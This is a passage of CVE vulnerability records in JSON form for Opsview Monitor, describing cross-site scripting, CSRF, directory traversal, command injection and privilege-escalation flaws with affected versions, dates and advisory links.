"version": "n/a"
}
]
}
],
"datePublic": "2018-09-04T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "The diagnosticsb2ksy parameter of the /rest endpoint in Opsview Monitor before 5.3.1 and 5.4.x before 5.4.2 is vulnerable to Cross-Site Scripting."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2018-09-05T20:57:01",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://knowledge.opsview.com/v5.4/docs/whats-new"
},
{
"name": "20180904 [CORE-2018-0008] - Opsview Monitor Multiple Vulnerabilities",
"tags": [
"mailing-list",
"x_refsource_FULLDISC"
],
"url": "https://seclists.org/fulldisclosure/2018/Sep/3"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://www.coresecurity.com/advisories/opsview-monitor-multiple-vulnerabilities"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://knowledge.opsview.com/v5.3/docs/whats-new"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2018-16148",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "The diagnosticsb2ksy parameter of the /rest endpoint in Opsview Monitor before 5.3.1 and 5.4.x before 5.4.2 is vulnerable to Cross-Site Scripting."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://knowledge.opsview.com/v5.4/docs/whats-new",
"refsource": "CONFIRM",
"url": "https://knowledge.opsview.com/v5.4/docs/whats-new"
},
{
"name": "20180904 [CORE-2018-0008] - Opsview Monitor Multiple Vulnerabilities",
"refsource": "FULLDISC",
"url": "https://seclists.org/fulldisclosure/2018/Sep/3"
},
{
"name": "https://www.coresecurity.com/advisories/opsview-monitor-multiple-vulnerabilities",
"refsource": "MISC",
"url": "https://www.coresecurity.com/advisories/opsview-monitor-multiple-vulnerabilities"
},
{
"name": "https://knowledge.opsview.com/v5.3/docs/whats-new",
"refsource": "CONFIRM",
"url": "https://knowledge.opsview.com/v5.3/docs/whats-new"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2018-16148",
"datePublished": "2018-09-05T21:00:00",
"dateReserved": "2018-08-29T00:00:00",
"dateUpdated": "2024-08-05T10:17:38.353Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2016-10367 (GCVE-0-2016-10367)
Vulnerability from cvelistv5 – Published: 2017-05-03 10:00 – Updated: 2024-09-16 19:19 - n/a
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-06T03:21:51.348Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2016-016/?fid=8341"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In Opsview Monitor Pro (Prior to 5.1.0.162300841, prior to 5.0.2.27475, prior to 4.6.4.162391051, and 4.5.x without a certain 2016 security patch), an unauthenticated Directory Traversal vulnerability can be exploited by issuing a specially crafted HTTP GET request utilizing a simple URL encoding bypass, %252f instead of /."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2017-05-03T10:00:00Z",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2016-016/?fid=8341"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2016-10367",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "In Opsview Monitor Pro (Prior to 5.1.0.162300841, prior to 5.0.2.27475, prior to 4.6.4.162391051, and 4.5.x without a certain 2016 security patch), an unauthenticated Directory Traversal vulnerability can be exploited by issuing a specially crafted HTTP GET request utilizing a simple URL encoding bypass, %252f instead of /."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2016-016/?fid=8341",
"refsource": "MISC",
"url": "https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2016-016/?fid=8341"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2016-10367",
"datePublished": "2017-05-03T10:00:00Z",
"dateReserved": "2017-05-03T00:00:00Z",
"dateUpdated": "2024-09-16T19:19:27.272Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2013-3935 (GCVE-0-2013-3935)
Vulnerability from nvd – Published: 2020-01-02 14:31 – Updated: 2024-08-06 16:22 - Cross-Site Request Forgery
| Vendor | Product | Version |
|---|---|---|
| Opsview | Opsview | Affected: before 4.4.1 |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-06T16:22:01.472Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://docs.opsview.com/doku.php?id=opsview4.4:changes#fixes"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://docs.opsview.com/doku.php?id=opsview-core:changes#opsview_core_20130822"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "Opsview",
"vendor": "Opsview",
"versions": [
{
"status": "affected",
"version": "before 4.4.1"
}
]
},
{
"product": "Opsview Core",
"vendor": "Opsview",
"versions": [
{
"status": "affected",
"version": "before 20130522"
}
]
}
],
"datePublic": "2013-10-02T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "Cross-site request forgery (CSRF) vulnerability in Opsview before 4.4.1 and Opsview Core before 20130522 allows remote attackers to hijack the authentication of administrators for requests that change the administrator password via unspecified vectors."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "Cross-Site Request Forgery ",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2020-01-02T14:31:52",
"orgId": "44d08088-2bea-4760-83a6-1e9be26b15ab",
"shortName": "flexera"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "http://docs.opsview.com/doku.php?id=opsview4.4:changes#fixes"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://docs.opsview.com/doku.php?id=opsview-core:changes#opsview_core_20130822"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "PSIRT-CNA@flexerasoftware.com",
"ID": "CVE-2013-3935",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "Opsview",
"version": {
"version_data": [
{
"version_value": "before 4.4.1"
}
]
}
},
{
"product_name": "Opsview Core",
"version": {
"version_data": [
{
"version_value": "before 20130522"
}
]
}
}
]
},
"vendor_name": "Opsview"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Cross-site request forgery (CSRF) vulnerability in Opsview before 4.4.1 and Opsview Core before 20130522 allows remote attackers to hijack the authentication of administrators for requests that change the administrator password via unspecified vectors."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "Cross-Site Request Forgery "
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "http://docs.opsview.com/doku.php?id=opsview4.4:changes#fixes",
"refsource": "MISC",
"url": "http://docs.opsview.com/doku.php?id=opsview4.4:changes#fixes"
},
{
"name": "http://docs.opsview.com/doku.php?id=opsview-core:changes#opsview_core_20130822",
"refsource": "MISC",
"url": "http://docs.opsview.com/doku.php?id=opsview-core:changes#opsview_core_20130822"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "44d08088-2bea-4760-83a6-1e9be26b15ab",
"assignerShortName": "flexera",
"cveId": "CVE-2013-3935",
"datePublished": "2020-01-02T14:31:52",
"dateReserved": "2013-06-04T00:00:00",
"dateUpdated": "2024-08-06T16:22:01.472Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2013-3936 (GCVE-0-2013-3936)
Vulnerability from nvd – Published: 2020-01-02 14:31 – Updated: 2024-08-06 16:30 - Cross-Site Scripting
| Vendor | Product | Version |
|---|---|---|
| Opsview | Opsview | Affected: before 4.4.1 |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-06T16:30:48.701Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://docs.opsview.com/doku.php?id=opsview4.4:changes#fixes"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://docs.opsview.com/doku.php?id=opsview-core:changes#opsview_core_20130822"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "Opsview",
"vendor": "Opsview",
"versions": [
{
"status": "affected",
"version": "before 4.4.1"
}
]
},
{
"product": "Opsview Core",
"vendor": "Opsview",
"versions": [
{
"status": "affected",
"version": "before 20130522"
}
]
}
],
"datePublic": "2013-10-02T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "Multiple cross-site scripting (XSS) vulnerabilities in Opsview before 4.4.1 and Opsview Core before 20130522 allow remote attackers to inject arbitrary web script or HTML."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "Cross-Site Scripting",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2020-01-02T14:31:49",
"orgId": "44d08088-2bea-4760-83a6-1e9be26b15ab",
"shortName": "flexera"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "http://docs.opsview.com/doku.php?id=opsview4.4:changes#fixes"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://docs.opsview.com/doku.php?id=opsview-core:changes#opsview_core_20130822"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "PSIRT-CNA@flexerasoftware.com",
"ID": "CVE-2013-3936",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "Opsview",
"version": {
"version_data": [
{
"version_value": "before 4.4.1"
}
]
}
},
{
"product_name": "Opsview Core",
"version": {
"version_data": [
{
"version_value": "before 20130522"
}
]
}
}
]
},
"vendor_name": "Opsview"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Multiple cross-site scripting (XSS) vulnerabilities in Opsview before 4.4.1 and Opsview Core before 20130522 allow remote attackers to inject arbitrary web script or HTML."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "Cross-Site Scripting"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "http://docs.opsview.com/doku.php?id=opsview4.4:changes#fixes",
"refsource": "MISC",
"url": "http://docs.opsview.com/doku.php?id=opsview4.4:changes#fixes"
},
{
"name": "http://docs.opsview.com/doku.php?id=opsview-core:changes#opsview_core_20130822",
"refsource": "MISC",
"url": "http://docs.opsview.com/doku.php?id=opsview-core:changes#opsview_core_20130822"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "44d08088-2bea-4760-83a6-1e9be26b15ab",
"assignerShortName": "flexera",
"cveId": "CVE-2013-3936",
"datePublished": "2020-01-02T14:31:49",
"dateReserved": "2013-06-04T00:00:00",
"dateUpdated": "2024-08-06T16:30:48.701Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2018-16145 (GCVE-0-2018-16145)
Vulnerability from nvd – Published: 2018-09-05 21:00 – Updated: 2024-08-05 10:17
- n/a
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-05T10:17:38.184Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://knowledge.opsview.com/v5.4/docs/whats-new"
},
{
"name": "20180904 [CORE-2018-0008] - Opsview Monitor Multiple Vulnerabilities",
"tags": [
"mailing-list",
"x_refsource_FULLDISC",
"x_transferred"
],
"url": "https://seclists.org/fulldisclosure/2018/Sep/3"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://www.coresecurity.com/advisories/opsview-monitor-multiple-vulnerabilities"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://knowledge.opsview.com/v5.3/docs/whats-new"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2018-09-04T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "The /etc/init.d/opsview-reporting-module script that runs at boot time in Opsview Monitor before 5.3.1 and 5.4.x before 5.4.2 invokes a file that can be edited by the nagios user, and would allow attackers to elevate their privileges to root after a system restart, hence obtaining full control of the appliance."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2018-09-05T20:57:01",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://knowledge.opsview.com/v5.4/docs/whats-new"
},
{
"name": "20180904 [CORE-2018-0008] - Opsview Monitor Multiple Vulnerabilities",
"tags": [
"mailing-list",
"x_refsource_FULLDISC"
],
"url": "https://seclists.org/fulldisclosure/2018/Sep/3"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://www.coresecurity.com/advisories/opsview-monitor-multiple-vulnerabilities"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://knowledge.opsview.com/v5.3/docs/whats-new"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2018-16145",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "The /etc/init.d/opsview-reporting-module script that runs at boot time in Opsview Monitor before 5.3.1 and 5.4.x before 5.4.2 invokes a file that can be edited by the nagios user, and would allow attackers to elevate their privileges to root after a system restart, hence obtaining full control of the appliance."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://knowledge.opsview.com/v5.4/docs/whats-new",
"refsource": "CONFIRM",
"url": "https://knowledge.opsview.com/v5.4/docs/whats-new"
},
{
"name": "20180904 [CORE-2018-0008] - Opsview Monitor Multiple Vulnerabilities",
"refsource": "FULLDISC",
"url": "https://seclists.org/fulldisclosure/2018/Sep/3"
},
{
"name": "https://www.coresecurity.com/advisories/opsview-monitor-multiple-vulnerabilities",
"refsource": "MISC",
"url": "https://www.coresecurity.com/advisories/opsview-monitor-multiple-vulnerabilities"
},
{
"name": "https://knowledge.opsview.com/v5.3/docs/whats-new",
"refsource": "CONFIRM",
"url": "https://knowledge.opsview.com/v5.3/docs/whats-new"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2018-16145",
"datePublished": "2018-09-05T21:00:00",
"dateReserved": "2018-08-29T00:00:00",
"dateUpdated": "2024-08-05T10:17:38.184Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2018-16147 (GCVE-0-2018-16147)
Vulnerability from nvd – Published: 2018-09-05 21:00 – Updated: 2024-08-05 10:17
- n/a
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-05T10:17:37.631Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://knowledge.opsview.com/v5.4/docs/whats-new"
},
{
"name": "20180904 [CORE-2018-0008] - Opsview Monitor Multiple Vulnerabilities",
"tags": [
"mailing-list",
"x_refsource_FULLDISC",
"x_transferred"
],
"url": "https://seclists.org/fulldisclosure/2018/Sep/3"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://www.coresecurity.com/advisories/opsview-monitor-multiple-vulnerabilities"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://knowledge.opsview.com/v5.3/docs/whats-new"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2018-09-04T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "The data parameter of the /settings/api/router endpoint in Opsview Monitor before 5.3.1 and 5.4.x before 5.4.2 is vulnerable to Cross-Site Scripting."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2018-09-05T20:57:01",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://knowledge.opsview.com/v5.4/docs/whats-new"
},
{
"name": "20180904 [CORE-2018-0008] - Opsview Monitor Multiple Vulnerabilities",
"tags": [
"mailing-list",
"x_refsource_FULLDISC"
],
"url": "https://seclists.org/fulldisclosure/2018/Sep/3"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://www.coresecurity.com/advisories/opsview-monitor-multiple-vulnerabilities"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://knowledge.opsview.com/v5.3/docs/whats-new"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2018-16147",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "The data parameter of the /settings/api/router endpoint in Opsview Monitor before 5.3.1 and 5.4.x before 5.4.2 is vulnerable to Cross-Site Scripting."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://knowledge.opsview.com/v5.4/docs/whats-new",
"refsource": "CONFIRM",
"url": "https://knowledge.opsview.com/v5.4/docs/whats-new"
},
{
"name": "20180904 [CORE-2018-0008] - Opsview Monitor Multiple Vulnerabilities",
"refsource": "FULLDISC",
"url": "https://seclists.org/fulldisclosure/2018/Sep/3"
},
{
"name": "https://www.coresecurity.com/advisories/opsview-monitor-multiple-vulnerabilities",
"refsource": "MISC",
"url": "https://www.coresecurity.com/advisories/opsview-monitor-multiple-vulnerabilities"
},
{
"name": "https://knowledge.opsview.com/v5.3/docs/whats-new",
"refsource": "CONFIRM",
"url": "https://knowledge.opsview.com/v5.3/docs/whats-new"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2018-16147",
"datePublished": "2018-09-05T21:00:00",
"dateReserved": "2018-08-29T00:00:00",
"dateUpdated": "2024-08-05T10:17:37.631Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2018-16146 (GCVE-0-2018-16146)
Vulnerability from nvd – Published: 2018-09-05 21:00 – Updated: 2024-08-05 10:17
- n/a
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-05T10:17:37.835Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://knowledge.opsview.com/v5.4/docs/whats-new"
},
{
"name": "20180904 [CORE-2018-0008] - Opsview Monitor Multiple Vulnerabilities",
"tags": [
"mailing-list",
"x_refsource_FULLDISC",
"x_transferred"
],
"url": "https://seclists.org/fulldisclosure/2018/Sep/3"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://www.coresecurity.com/advisories/opsview-monitor-multiple-vulnerabilities"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2018-09-04T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "The web management console of Opsview Monitor 5.4.x before 5.4.2 provides functionality accessible by an authenticated administrator to test notifications that are triggered under certain configurable events. The value parameter is not properly sanitized, leading to arbitrary command injection with the privileges of the nagios user account."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2018-09-05T20:57:01",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://knowledge.opsview.com/v5.4/docs/whats-new"
},
{
"name": "20180904 [CORE-2018-0008] - Opsview Monitor Multiple Vulnerabilities",
"tags": [
"mailing-list",
"x_refsource_FULLDISC"
],
"url": "https://seclists.org/fulldisclosure/2018/Sep/3"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://www.coresecurity.com/advisories/opsview-monitor-multiple-vulnerabilities"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2018-16146",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "The web management console of Opsview Monitor 5.4.x before 5.4.2 provides functionality accessible by an authenticated administrator to test notifications that are triggered under certain configurable events. The value parameter is not properly sanitized, leading to arbitrary command injection with the privileges of the nagios user account."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://knowledge.opsview.com/v5.4/docs/whats-new",
"refsource": "CONFIRM",
"url": "https://knowledge.opsview.com/v5.4/docs/whats-new"
},
{
"name": "20180904 [CORE-2018-0008] - Opsview Monitor Multiple Vulnerabilities",
"refsource": "FULLDISC",
"url": "https://seclists.org/fulldisclosure/2018/Sep/3"
},
{
"name": "https://www.coresecurity.com/advisories/opsview-monitor-multiple-vulnerabilities",
"refsource": "MISC",
"url": "https://www.coresecurity.com/advisories/opsview-monitor-multiple-vulnerabilities"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2018-16146",
"datePublished": "2018-09-05T21:00:00",
"dateReserved": "2018-08-29T00:00:00",
"dateUpdated": "2024-08-05T10:17:37.835Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2018-16144 (GCVE-0-2018-16144)
Vulnerability from nvd – Published: 2018-09-05 21:00 – Updated: 2024-08-05 10:17
- n/a
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-05T10:17:37.656Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://knowledge.opsview.com/v5.4/docs/whats-new"
},
{
"name": "20180904 [CORE-2018-0008] - Opsview Monitor Multiple Vulnerabilities",
"tags": [
"mailing-list",
"x_refsource_FULLDISC",
"x_transferred"
],
"url": "https://seclists.org/fulldisclosure/2018/Sep/3"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://www.coresecurity.com/advisories/opsview-monitor-multiple-vulnerabilities"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://knowledge.opsview.com/v5.3/docs/whats-new"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2018-09-04T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "The test connection functionality in the NetAudit section of Opsview Monitor before 5.3.1 and 5.4.x before 5.4.2 is vulnerable to command injection due to improper sanitization of the rancid_password parameter."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2018-09-05T20:57:01",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://knowledge.opsview.com/v5.4/docs/whats-new"
},
{
"name": "20180904 [CORE-2018-0008] - Opsview Monitor Multiple Vulnerabilities",
"tags": [
"mailing-list",
"x_refsource_FULLDISC"
],
"url": "https://seclists.org/fulldisclosure/2018/Sep/3"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://www.coresecurity.com/advisories/opsview-monitor-multiple-vulnerabilities"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://knowledge.opsview.com/v5.3/docs/whats-new"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2018-16144",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "The test connection functionality in the NetAudit section of Opsview Monitor before 5.3.1 and 5.4.x before 5.4.2 is vulnerable to command injection due to improper sanitization of the rancid_password parameter."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://knowledge.opsview.com/v5.4/docs/whats-new",
"refsource": "CONFIRM",
"url": "https://knowledge.opsview.com/v5.4/docs/whats-new"
},
{
"name": "20180904 [CORE-2018-0008] - Opsview Monitor Multiple Vulnerabilities",
"refsource": "FULLDISC",
"url": "https://seclists.org/fulldisclosure/2018/Sep/3"
},
{
"name": "https://www.coresecurity.com/advisories/opsview-monitor-multiple-vulnerabilities",
"refsource": "MISC",
"url": "https://www.coresecurity.com/advisories/opsview-monitor-multiple-vulnerabilities"
},
{
"name": "https://knowledge.opsview.com/v5.3/docs/whats-new",
"refsource": "CONFIRM",
"url": "https://knowledge.opsview.com/v5.3/docs/whats-new"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2018-16144",
"datePublished": "2018-09-05T21:00:00",
"dateReserved": "2018-08-29T00:00:00",
"dateUpdated": "2024-08-05T10:17:37.656Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2018-16148 (GCVE-0-2018-16148)
Vulnerability from nvd – Published: 2018-09-05 21:00 – Updated: 2024-08-05 10:17
- n/a
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-05T10:17:38.353Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
